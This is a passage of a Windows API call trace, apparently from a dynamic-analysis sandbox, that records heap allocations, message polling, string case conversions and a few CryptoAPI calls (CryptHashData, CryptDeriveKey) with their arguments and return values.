hHeap=0x25c0000) returned 1 [0266.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.709] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.710] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.710] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0266.711] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0266.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0266.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.714] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0266.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0266.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0266.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0266.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x24a9f60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0266.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.716] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0266.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0266.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0266.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0266.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0266.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.717] CryptHashData (hHash=0xaa5860, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0266.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0266.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0266.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0266.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0266.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0266.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0266.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0266.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0266.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0266.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0266.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0266.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0266.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.731] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.732] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.732] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.733] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.733] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.734] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.734] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.734] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.735] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.735] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.735] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.736] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.736] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0266.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.737] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0266.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0266.738] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 